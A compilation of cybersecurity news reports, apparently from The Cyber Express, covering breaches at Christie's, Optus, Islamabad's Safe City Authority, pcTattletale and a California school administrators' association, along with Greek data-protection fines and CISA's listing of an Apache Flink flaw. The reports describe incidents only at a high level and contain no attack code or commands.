Christie’s acknowledged the cyberattack on Christie's Auction House and unauthorized access, with spokesman Edward Lewine stating that the auction house is investigating the incident. The preliminary findings indicate that the hackers obtained a limited amount of personal client data but stopped short of compromising financial or transactional records. Christie CEO Guillaume Cerutti also stated in a recent interview with CNBC that there was no evidence that any transaction or financial data has been impacted or leaked in the incident. The company appeared to downplay the impact of the incident earlier, describing it as a "technology security incident." However, employees privately reported a sense of panic, with limited information shared about the breach by top leaders. Several prominent buyers and sellers also indicated to the New York Times that they were in the dark about the impact, and were not alerted to the hack until a reporter had reached out to them. Lewine stated that the auction house was now in the process of notifying privacy regulators and government agencies, and would also be notifying affected clients shortly. Despite the attack, the spring sales concluded with $528 million in revenue, suggesting the incident did not significantly deter bidding activities. Following the sales, Christie's regained control of its website. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

The Greek Personal Data Protection Authority (PDPA) has imposed significant fines on the Greek Ministry of Interior and New Democracy MEP Anna-Michelle Asimakopoulou for their roles in violating data protection regulations in the 'email-gate' scandal. The fines come after an investigation into the "email-gate" scandal, in which Asimakopoulou was accused of sending unsolicited emails to Greeks living abroad ahead of the European Parliament elections in June.

Ministry of Interior Violations and Consequences

The authority found that a file of 25,000 voters registered for the June 2023 elections had been leaked between June 8 and 23, 2023. The list, which included voter emails, was sent to New Democracy's then Secretary for Diaspora Affairs, Nikos Theodoropoulos, by an unknown individual. Theodoropoulos forwarded the file to MEP Asimakopoulou, who used it to send mass campaign emails in violation of data protection laws and basic principles of legality. [caption id="attachment_71501" align="alignnone" width="1000"] Source: Shutterstock (MEP Anna-Michelle Asimakopoulou)[/caption] On receiving the unsolicited emails to their private accounts, several Greek diaspora voters living abroad expressed their surprise on social media and accused the New Democracy MEP of violating the European Union’s General Data Protection Regulation (GDPR). The expats questioned how the addresses were obtained by the MEP for use in the email campaigns. Asimakopoulou earlier attempted to refute allegations of violating these data protection laws but was found to provide contradictory explanations regarding the source from which these addresses were obtained for usage in the mass email campaign. As a result, the Ministry of Interior faces a 400,000-euro fine, while Asimakopoulou faces a 40,000-euro fine. The authority also postponed its verdict on Theodoropoulos and the New Democracy party  to examine new claims related to the investigation. The PDPA stated in its investigation that the use of the emails, “was in violation of the basic principle of legality, objectivity and transparency of processing, as it was in violation of a series of provisions of the electoral legislation and furthermore could not reasonably be expected.” The ministry said it will "thoroughly study" the authority's decision to consider further legal actions. The "email-gate" scandal has led to significant consequences, including the resignation of the general secretary of the Interior Ministry, Michalis Stavrianoudakis, and the dismissal of Theodoropoulos by New Democracy. Asimakopoulou has announced she will not run in the European Parliament elections. Asimakopoulou is also facing 75 lawsuits by citizens and over 200 lawsuits from the Interior Ministry, over the scandal.

Reaction of Opposition Parties to the Investigation Results

Opposition parties are now demanding the resignation of Interior Minister Niki Kerameos following the outcome of the investigation into the unsolicited emails. [caption id="attachment_71241" align="alignnone" width="1000"] Source: Shuttertock (Interior Minister Niki Kerameos)[/caption] The main opposition party SYRIZA released a statement asserting that “private data were being passed around for months among the Interior Ministry, ND, and at least one election candidate,” questioning whether the email list had been leaked to other New Democracy candidates by the Interior Ministry. While the Interior Minister might not have been directly involved, SYRIZA claimed that “Kerameos did not have the guts to show up at the Committee on Institutions and Transparency.” The Socialist PASOK Party also demanded Kerameos’ resignation, adding that the violation demonstrates the government as “incapable of fulfilling the self-evident, as proven by the high fines.” Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Islamabad's Safe City Authority experienced a significant disruption when its online system was breached by hackers, prompting an immediate shutdown. The Safe City Islamabad Project, initiated by the PPP-led government and backed by a Chinese government concessional loan, aimed to enhance the capital's surveillance and security capabilities with the installation of 1,950 CCTV cameras, a bomb-proof command center, a 4G communication network, and advanced monitoring systems such as facial recognition technology. This unforeseen event has raised concerns over the security and the vulnerability of the system, as law enforcement officials scramble to assess the damage and restore operations.

Islamabad's Safe City Authority Breach and Initial Response

The breach revealed several systemic weaknesses within the Safe City Authority's digital infrastructure. Hackers successfully infiltrated the primary server, gaining unauthorized access to databases containing criminal records and sensitive information. While the system's firewall did issue an alert upon detecting the intrusion, the absence of backup servers and contingency plans forced a complete shutdown of the affected software and applications. The assault compromised several integral systems, including the Complaint Management System, Criminal Management Record System, and Human Resource Management System, along with software and applications vital for the Operation Division. [caption id="attachment_70433" align="alignnone" width="2800"] Source: china.aiddata.org[/caption] The compromise of these systems impacted several critical services tied to the Safe City initiative. This includes mobile applications, smart police vehicle records, police station data, video analytics, Islamabad Traffic Police, e-challan systems, and records from the operations division. Approximately 13 to 15 servers provided by the police facilitation center F-6 were also affected. An officer highlighted to Dawn, Pakistan's largest English newspaper, that this incident was not a typical hacking scenario involving stolen login credentials. Instead, the system's vulnerability stemmed from the use of simple and common login IDs and passwords by officials, making it easier for hackers to gain access. Additionally, many of the software and applications were found to be outdated or with expired licenses, further compromising the system's security. Despite the breach of several systems, the Safe City cameras' management system that operated independently through offline direct lines, remained secure, demonstrating the effectiveness of isolated systems in safeguarding against such attacks. Police spokesperson Taqi Jawad confirmed the intrusion as an attempted breach that triggered the firewall's alarm but stated that appropriate precautionary measures had been taken. "All logins have been closed for the past two days to change them, including those of police stations and officers at various ranks," he stated. Jawad refrained from sharing further specifics on the server shutdowns as he stated they were still pending technical feedback

Controversy Over Islamabad's Safe City Authority

Islamabad's Safe City project has been a source of serious controversy, with several litigations over contract transparency and cost inflation, leading the Supreme Court's order to cancel the initial contract with Huawei in 2012. The contract was later renegotiated, and the project resumed under the PMLN (Pakistan Muslim League)  government, with the command center becoming operational in 2016. By 2016, 1,805 cameras were installed, and as of 2021, 95% remained functional. Despite the extensive infrastructure, police sources claimed in 2022 that the system had not prevented any incidents or facilitated any arrests, raising questions about its effectiveness. Due to financial strain, Pakistan and China Eximbank signed several debt suspension agreements from July 2020 to December 2021, temporarily suspending principal and interest payments under the concessional loan agreement. Tragically, the project's director was found dead in July 2022 in an apparent suicide. The successful breach of the authority's systems draws additional controversy towards the project, which was intended to be a cornerstone of Islamabad's security infrastructure but has encountered several operational, legal, and financial setbacks. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Optus, one of Australia's largest telecommunications companies, has lost a legal battle in the Federal Court. The Australian Federal Court has ordered the company to release an external review performed by Deloitte to investigate the cause of a significant 2022 cyberattack that led to the release of sensitive customer data. The Optus 2022 data breach resulted in the exposure of the names, dates of birth, phone numbers, and email addresses of over 10 million customers with addresses, driver's licence or passport numbers being exposed for a portion of the affected customers.

Optus Appeal Against Sharing External Deloitte Report

The data breach incident along with 14-hour outage of its telecommunication services, frustrations over the availability of information/credit monitoring services and attempts of attackers to exploit the compromised data for use in SMS phishing attacks, led to intense scrutiny towards the company. [caption id="attachment_70354" align="alignnone" width="2230"] Source: www.optus.com.au/support/cyberresponse[/caption] The company commissioned an independent external forensic review of the cyberattack from Deloitte over its security systems, controls and processes under the advise of the then CEO Kelly Bayer Rosmarin and the approval of its board. Bayer made the following statement over the decision:

“This review will help ensure we understand how it occurred and how we can prevent it from occurring again. It will help inform the response to the incident for Optus. This may also help others in the private and public sector where sensitive data is held and risk of cyberattack exists.

Kelly, later resigned over the incident with Optus now being led by a new CEO, who is working to rebuild trust with customers in a 'challenging' market. Despite the efforts of the company to deal with the data breach, the recent court decision comes after Optus appealed an earlier ruling that it must hand over the report to Slater & Gordon, the law firm pursuing a class action against the company for allegedly failing to protect its customers' personal information. Optus has not yet made a public statement regarding the Federal Court's decision. However, the company had previously argued that the Deloitte report was commissioned to provide legal advice and therefore it was privileged. The court, however, decided that Optus had failed to prove that the dominant purpose of the report was for legal advice.

Class Action Law Suit Against Optus and Implications of Court Ruling

Slater & Gordon, the law firm representing the affected Optus customers, has welcomed the court's decision. The law firm's class actions practice group leader, Ben Hardwick, criticized Optus's efforts to keep the report confidential, stating that it indicates the company's refusal to accept responsibility for its role in the data breach and its impact on millions of its customers. In it's April 2023 press release, the law firm's leader had stated that more than 100,000 of Optus’s current and former customers had registered for the class action, with some notable examples among the group group such as:

• a domestic violence victim who spent money that was intended for counselling for her children on increasing security measures around the house, including installing video cameras and extra locks on doors and windows

• a former Optus customer who had previously been burgled and had his identity stolen who now suffers severe anxiety after learning his personal information had been shared online

• a stalking victim who takes extreme measure to maintain her privacy, especially her address, who fears her life has genuinely been put in danger by the data breach

• a woman who is now too fearful to answer the telephone after noticing an increase in scam phone calls following the Optus cyberattack, and

• a retired police officer concerned that his home address may have been shared with criminals he was involved in the prosecution and incarceration of.

The press release also cited the frustration several customers expressed over alleged delays by Optus in providing details over the data breach, and reported inconsistencies in how the telecommunications giant had been treating affected customers Some Optus registrants claimed to the law firm that they were dismissed when they sought further information from Optus, while others informed that the company refused to pay for credit monitoring services under the basis that they were no longer Optus customers. “There appears to have been a piecemeal response from Optus, rather than a coordinated approach that made sure everyone whose data was compromised is treated the same." The Federal Court's decision sets a significant precedent for companies involved in data breaches. It underscores the importance of transparency and accountability in such situations, and it may encourage other companies to take stronger measures to protect their customers' personal information. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Soon after an independent researcher exposed a vulnerability in the commercial-grade pcTattletale spyware tool that could compromise recordings, the tool’s website was hacked and defaced. The hacker claimed to have accessed at least 17TB of victim screenshots and other sensitive data, viewing the site's hacking as a personal challenge after a researcher's limited disclosure to prevent exploitation of the flaw by bad actors. Amazon promptly placed an official lock on the site's AWS infrastructure following the hacking incident. The pcTattletale spyware's flawed architecture and its discovery demonstrate the inherent vulnerabilities present in common spyware applications, potentially impacting not just individuals but entire organizations and families.

pcTattletale Spyware Vulnerabilities and Poor-Data Handling Practices

The pcTattletale spyware tool offered a live feed of screenshots from the victim's device as its primary feature, alongside typical spyware functionalities like location tracking. However, this extensive monitoring feature backed on poor infrastructure and data-handling practices has also been its downfall, with data breaches exposing private data of targets. First, a 2021 data breach incident demonstrated Individual Directory Override (IDOR) vulnerabilities in the spyware tool's domain infrastructure, potentially allowing access to sensitive data through guessable Amazon S3 URLs. Last week, researcher Eric Daigle uncovered an API bug that also potentially allowed access to sensitive data across registered devices. This vulnerability allowed unauthorized users to access private information in the form of comprehensive screen recordings. A subsequent hack then exposed pcTattletale's backend to the public, revealing an astonishing disregard for secure practices. The hacker discovered that the spyware shipped with hardcoded AWS credentials, accessible via a hidden webshell, potentially enabling years of undetected data exfiltration. This oversight, remarkable for its simplicity and duration, underscores a major failure in the handling of user data.

pcTattletale Spyware Latest Hack

The hacker defaced pcTattletale's official site, replacing it with a writeup of the operation and links to compromised data obtained from the site's AWS infrastructure. The vastness of the data stored by pcTattletale was found to be overwhelming, with the hacker reporting their discovery of over 17 terabytes of victim device screenshots from more than 10,000 devices, some dating back to 2018. Although the released data dump did not include these screenshots, it reportedly contained database dumps, full webroot files for the stalkerware service, and other S3 bucket contents, exposing years of sensitive information.   [caption id="attachment_70264" align="alignnone" width="2230"] Source: archive.org[/caption] The breach also uncovered a simple webshell hidden since at least December 2011 in the spyware's backend code. This backdoor allowed for arbitrary PHP code execution through the use of cookies, raising questions about its origin—whether it was placed by pcTattletale itself as a backdoor or a threat actor. The hacker later updated the defaced site to share a video, claiming it as footage of the pcTattletale's founder attempts to restore the site. It took over 20 hours for the defaced website to be taken down, with the pcTattletale’s service continuing to send screenshots to the S3 bucket until Amazon officially locked down the spyware service's AWS account. [caption id="attachment_70324" align="alignnone" width="1206"] Source: ericdaigle.ca[/caption] Following the official lockdown of the site's AWS infrastucture, security researcher Eric Daigle, expanded his earlier limited disclosure with step-by-step exploit of the stated flaw. He noted that while the site's attacker exploited an unrelated flaw, it was about as equally trivial in it's complexity.

Victims Affected by pcTattletale Spyware Data Leak

The pcTattletale data leak is particularly alarming as several organizations employed the tool to monitor employees and clients, exposing confidential information across various sectors, such as banks, law firms, educational institutes, healthcare providers, and even government agencies. Notable instances of victims affected by the data breach as stated by security researcher maia crimew who explored the incident and shared data in a blog article, include:

• Hotels leaking guest information such as personal data and credit card details.
• Law firms exposing lawyer-client communications and client bank-routing information
• A bank revealing confidential client data
• Educational institutes such as schools and childcare centers monitoring employees or students, revealing personal data.
• Healthcare providers exposing patient information.
• Palestinian government agency employee monitored.
• The HR department of a Boeing supplier revealing personal information of employees .
• Tech companies secretly installing pcTattletale on employee devices suspected of wrongdoing, exposing internal systems and source code.
• A bug bounty hunter who installed the software for pentesting, then immediately tried to uninstall it.

Concerningly, the spyware was also offered as a way for parents and spouses to maintain tabs over their children and partners respectively, potentially exposing this information in the resulting breach. [caption id="attachment_70278" align="alignnone" width="1920"] Source: maia.crimew.gay[/caption] Given the wide range of affected companies and the significant security lapses, security researcher maia crimew noted that pcTattletale could face severe repercussions, possibly leading to a cessation of its operations as the Federal Trade Commission (FTC) had previously ordered other US stalkerware developers to cease operations following breaches, with pcTattletale’s case poised for similar consequences. The widespread misuse and systemic security failures of pcTattletale highlight the dangers inherent in stalkerware software and services, as well as the urgent need for stringent regulatory oversight and robust security measures over these tools to protect the data and privacy of individuals and organizations. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

An independent researcher claims that commercial grade spyware tool pcTattletale was found to leak live-screen recordings/screenshots to the internet, making it accessible by anyone and not just the app's intended users. The pcTattletale stalkerware sees wide usage and has been discovered on hotel guest check-in computers, corporate systems and computers employed by law firms across the United States. The app promotes itself with parents, spouses/partners and enterprises with the promise of discrete instant real-time monitoring and easy installation.

pcTattletale Stalkerware Reportedly Leaks Screen Recordings

The pcTattletale spyware tool primarily focuses on advertising itself towards parents concerned over the social media usage of their children and businesses aiming to monitor employees, claiming to offer a window into the online world of children and disruptions to the daily workflow of employees. The tool is available for installation on both Windows and Android operating systems. While the site claims this tracking is safe, Eric Daigle, an independent security researcher claims to have discovered a flaw in the spyware's API that allows attackers to obtain the most recent screen capture on devices with the tool installed. Reached by the Cyber Express Team, Daigle shed some additional details on the purported vulnerability. The researcher said the tool allows users to sign up on the website, after which they are granted custom .exe or .apk files to install on the target's device. The customized file is hardcoded with the users' credentials, Daigle said, simplifying the installation process to essentially two clicks, with the only real other input the acceptance of permission requests required to successfully capture the screen. After the installation process, the spyware's user can access their accounts on the website to trigger or access screen captures. However, Daigle said the recordings he observed weren't a video file but static screenshots taken a few seconds apart, which are stitched together and played in the form of .GIF file to produce the desired recording of the target. Daigle said many U.S. hotels, corporate computers and at least two law firms appeared to be compromised and vulnerable to the flaw. However, the researcher expressed his desire to keep further details about victims anonymous for privacy purposes, along with details on exploiting the flaw to prevent potential attackers from taking advantage. However, the researcher was unclear if the software was installed by corporate owners, as advertised as a use case on the pcTattletale website, or if the installation was done by other actors. The researcher highlighted the serious consequences and potential impact of leaking live screen recordings, such as the leak of sensitive personal information, financial information, or the capture of passwords. The researcher said he had contacted the spyware vendor about the vulnerability but was ignored. He indicated that he would be ready to do a full write-up of the flaw once it had been patched. The pcTattletale site appeared to be down at the time of publishing this article

Spyware/Stalkerware Tools Remain a Major Concern

Spyware tools pose serious inherent risks aside from their intended purposes, as they could be exploited to violate the privacy of all kinds of individuals or groups. In 2023, researchers observed a Spanish spyware vendor's tools employing multiple zero-days and n-days in its exploit chain, and delivering the spyware module through the use of one-time links in SMS messages. These tools were used against targets in the United Arab Emirates (UAE). Last month, Apple issued notifications to users in 92 different countries to alert them of mercenary spyware attacks. In the same month, the United States government issued several visa restrictions on individuals identified with being connected to or profiting from the usage/proliferation of commercial spyware. In its notice, the U.S. government cited its concerns over the usage of these apps to facilitate human rights abuses or counter-intelligence efforts as justification for the issue of these restrictions. Several of these concerns are also shared by privacy-advocating individuals, groups such as the Coalition Against Stalkerware and non-profit organizations such as the U.S. National Cybersecurity Alliance. The National Cybersecurity Alliance defines the use of these tools against targets as a form of abuse on its Stay Safe Online website. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has recently added a four-year-old security flaw affecting Apache Flink to its Known Exploited Vulnerabilities (KEV) catalog, following evidence of active exploitation. The flaw, tracked as CVE-2020-17519, poses significant risks due to improper access control, allowing unauthorized access to sensitive information.

Researchers Observed Active Exploitation of Apache Flink Vulnerability

CISA describes vulnerabilities such as the Apache Flink Vulnerability which have been added to its Known Exploited Vulnerabilities catalog as "frequent attack vectors for malicious cyber actors" and as posing significant risks to the federal enterprise. The catalog serves as a critical resource for identifying and mitigating vulnerabilities actively in use. CVE-2020-17519 is a critical vulnerability in Apache Flink, an open-source framework for stream-processing and batch-processing. The flaw arises from improper access control in versions 1.11.0, 1.11.1, and 1.11.2 of the framework, potentially enabling remote attackers to access files specific to the local JobManager filesystem through the use of specially crafted directory traversal requests, leading to unauthorized access. While precise details of ongoing campaigns exploiting the Apache Flink Vulnerability remain unclear, the bug has existed for at least four years and has been acknowledged by a project maintainer. The project Apache Flink thread states:

A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process. Access is restricted to files accessible by the JobManager process.

The discovery of the vulnerability was credited to "0rich1" from Ant Security FG Lab, with working exploit code of the vulnerability available on the public web. In the same year, researchers from Palo Alto Networks had observed the vulnerability among the most commonly exploited vulnerabilities during the Winter 2020 period using information collected between November 2020 and January 2021.

Mitigation Measures and Binding Directives

The Apache Software Foundation addressed this issue in January 2021 with the release of Flink versions 1.11.3 and 1.12.0 to the master branch of the project. Users running affected versions are strongly urged to upgrade to these versions to secure their systems. CISA has mandated federal agencies to apply necessary patches by June 13, 2024. This directive operates under the Binding Operational Directive (BOD) which requires Federal Civilian Executive Branch (FCEB) agencies to implement fixes for listings in the Known Exploited Vulnerabilities Catalog to protect agency networks against active threats. Although the directive only applies to FCEB agencies, CISA has urged all organizations to reduce their exposure to cyberattacks through applying the mitigations in the catalog as per vendor instructions or to discontinue the use of affected products if mitigations are unavailable. In 2022, a critical vulnerability discovered in Apache Commons Text potentially granted threat actors access to remote servers. While fixes were soon released for both vulnerabilities, these incidents highlight the importance of timely updates and patches for vulnerabilities present in widely deployed open-source projects, frameworks and components. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

An unknown ransomware actor has compromised the personally identifiable data of more than 50,000 Californian school administrators, their association told Maine's Attorney General in a breach notice. The Association of California School Administrators (ACSA), the largest association for school leaders in the United States, said it spotted the data breach in September 2023, when an unauthorized actor accessed and potentially exfiltrated sensitive data.

Association of California School Administrators Ransomware Attack Investigation

The association's notice to the Maine Attorney General revealed that it had first detected "encryption activity" indicative of a ransomware attack in it's computer environment on September 24, last year. No threat group has yet claimed responsibility for the attack. This detection was followed by an investigation, aided by third-party cybersecurity experts who confirmed unauthorized access to various ACSA systems over two days after the initial access. The threat actor was found to have potentially accessed and stolen sensitive data from the compromised systems. The association also worked to validate the results of the investigation and locate missing address information. After ACSA completed the process of validating and identifiying affected individuals on May 3, 2024, it then took up the task of notifying all potentially affected individuals on May 22. ACSA informed the Maine Attorney General that approximately 54,600 individuals were impacted by the incident, including 14 Maine residents. Individuals impacted by the breach were provided with specific details about the incident and the steps they could take to protect their personal information. The compromised files were found to contain sensitive data such as names, addresses, dates of birth, Social Security numbers, driver's license numbers, payment card information, medical information, health insurance details, tax IDs, student records (report cards and test scores), employer-assigned identification numbers, and online account credentials.

Recommendations and Additional Resources to Affected Individuals

In response to the breach, ACSA began notifying federal law enforcement, implemented additional security measures such as training of its employees, and provided relevant guidance to the affected individuals on protecting themselves from associated risks such as identity theft and fraud. The association stated that there was no evidence of identity theft or fraud resulting from the event. However, as a precautionary measure, it is offering credit monitoring services for 12 months to the affected individuals at no cost. These services include credit and CyberScan monitoring, a million-dollar insurance reimbursement policy, and fully managed identity theft recovery services. ACSA encouraged affected individuals to opt for enrolment into these services before the deadline set for August 22, 2024. ACSA advises all affected individuals to monitor their accounts and credit reports for any unauthorized activity, stating that it took the privacy and security of sensitive information within its care seriously and regretted any inconvenience stemming from the incident to individuals. The guidance also offered instructions on reporting suspicious activity to banks and credit card companies, placing fraud alerts and credit freezes on credit files, and obtaining free credit reports available under U.S. law. ACSA is also encouraging individuals to contact the Federal Trade Commission, state attorneys general, and law enforcement to report any incidents of identity theft. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.